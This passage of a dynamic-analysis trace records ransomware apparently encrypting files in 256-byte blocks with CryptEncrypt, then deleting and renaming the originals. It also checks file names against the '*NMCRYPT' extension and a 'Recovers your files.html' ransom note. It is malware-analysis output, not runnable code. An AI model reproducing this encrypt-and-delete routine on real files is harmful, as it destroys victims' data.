hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.515] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.515] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.515] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.515] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.515] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.515] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.515] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.515] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.515] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.515] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.515] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.515] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.515] GetLastError () returned 0x0 [0148.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.516] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.516] GetLastError () returned 0x0 [0148.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.516] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.516] GetLastError () returned 0x0 [0148.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.516] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.516] GetLastError () returned 0x0 [0148.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.516] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.516] GetLastError () returned 0x0 [0148.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.516] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.516] GetLastError () returned 0x0 [0148.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.516] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.516] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.516] GetLastError () returned 0x0 [0148.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.517] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.517] GetLastError () returned 0x0 [0148.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.517] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.517] GetLastError () returned 0x0 [0148.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.517] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.517] GetLastError () returned 0x0 [0148.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.517] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.517] GetLastError () returned 0x0 [0148.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.517] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.517] GetLastError () returned 0x0 [0148.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.517] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.517] GetLastError () returned 0x0 [0148.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.518] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.518] GetLastError () returned 0x0 [0148.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.518] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.518] GetLastError () returned 0x0 [0148.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.518] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.518] GetLastError () returned 0x0 [0148.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.518] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.518] GetLastError () returned 0x0 [0148.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.518] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.518] GetLastError () returned 0x0 [0148.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.518] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.518] GetLastError () returned 0x0 [0148.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.519] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.519] GetLastError () returned 0x0 [0148.519] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.519] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.519] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.519] GetLastError () returned 0x0 [0148.519] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.519] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.519] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.519] GetLastError () returned 0x0 [0148.519] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.519] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.519] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.519] GetLastError () returned 0x0 [0148.519] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.519] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.519] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.519] GetLastError () returned 0x0 [0148.519] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.521] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 1 [0148.521] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0 [0148.521] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" [0148.521] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0148.521] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXB71F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxb71f.tmp")) returned 0xb71f [0148.524] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXB71F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxb71f.tmp"), dwFlags=0x1) returned 0 [0148.524] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXB71F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxb71f.tmp")) returned 1 [0148.525] CryptDestroyKey (hKey=0x9ad238) returned 1 [0148.525] wcslen (_String="OK") returned 0x2 [0148.525] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.525] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.525] CryptDestroyKey (hKey=0x9ad738) returned 1 [0148.525] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0148.525] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*NMCRYPT") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*Recovers your files.html") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", pszSpec="*.exe") returned 0 [0148.525] PathMatchSpecW (pszFile="boxed-delete.avi", 